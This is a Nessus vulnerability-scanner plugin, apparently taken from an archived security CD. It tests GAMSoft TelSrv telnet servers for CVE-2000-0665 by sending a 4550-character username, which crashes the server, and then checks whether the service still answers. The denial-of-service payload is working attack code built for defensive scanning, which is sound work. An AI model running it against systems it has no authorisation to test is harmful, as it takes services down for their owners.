home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / TelSrv_DoS.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  89 lines
  1. #
  2. # This script was written by Prizm <Prizm@RESENTMENT.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # Changes by rd: 
  7. # - description changed somehow
  8. # - handles the fact that the shareware may not be registered
  9.  
  10.  
  11. if(description) {
  12.     script_id(10474);
  13.     script_bugtraq_id(1478);
  14.  script_version ("$Revision: 1.13 $");
  15.     script_cve_id("CVE-2000-0665");
  16.     name["english"] = "GAMSoft TelSrv 1.4/1.5 Overflow";
  17.     script_name(english:name["english"]);
  18.  
  19.     desc["english"] = "
  20. It is possible to crash the remote telnet server by
  21. sending a username that is 4550 characters long.
  22.  
  23. An attacker may use this flaw to prevent you
  24. from administering this host remotely.
  25.  
  26. Solution : Contact your vendor for a patch.
  27.  
  28. Risk factor : High";
  29.  
  30.      desc["francais"] = "
  31. Il est possible de faire planter le serveur telnet
  32. distant en utilisant un nom de login de 4550 charactΦres.
  33.  
  34. Un pirate peut utiliser ce problΦme pour vous empecher
  35. d'administrer ce serveur α distance.
  36.  
  37. Facteur de risque : ElevΘ 
  38. Solution : contactez votre vendeur et demandez un patch";
  39.  
  40.  
  41.     script_description(english:desc["english"],
  42.                 francais:desc["francais"]);
  43.  
  44.     summary["english"] = "Crash GAMSoft TelSrv telnet server.";
  45.     script_summary(english:summary["english"]);
  46.  
  47.     script_category(ACT_DENIAL);
  48.  
  49.     script_copyright(english:"This script is Copyright (C) 2000 Prizm <Prizm@RESENTMENT.org");
  50.     family["english"] = "Denial of Service";
  51.     family["francais"] = "DΘni de service";
  52.     script_family(english:family["english"], francais:family["francais"]);
  53.     script_dependencie("find_service.nes");
  54.     script_require_ports("Services/telnet", 23);
  55.     exit(0);
  56. }
  57. port = get_kb_item("Services/telnet");
  58. if(!port)port = 23;
  59. if(!get_port_state(port))exit(0);
  60.  
  61. soc = open_sock_tcp(port);
  62. if(soc)
  63. {
  64.   r = telnet_init(soc);
  65.   r2 = recv(socket:soc, length:4096);
  66.   r = r + r2;
  67.   if(r)
  68.   {
  69.   r = recv(socket:soc, length:8192);
  70.   if("5 second delay" >< r)sleep(5);
  71.   r = recv(socket:soc, length:8192);
  72.   req = string(crap(4550), "\r\n");
  73.   send(socket:soc, data:req);
  74.   close(soc);
  75.   sleep(1);
  76.  
  77.   soc2 = open_sock_tcp(port);
  78.   if(!soc2)security_hole(port);
  79.   else {
  80.         r = telnet_init(soc2);
  81.     r2 = recv(socket:soc2, length:4096);
  82.     r = r + r2;
  83.         close(soc2);
  84.         if(!r)security_hole(port);
  85.       }
  86.   }  
  87. }
  88.  
  89.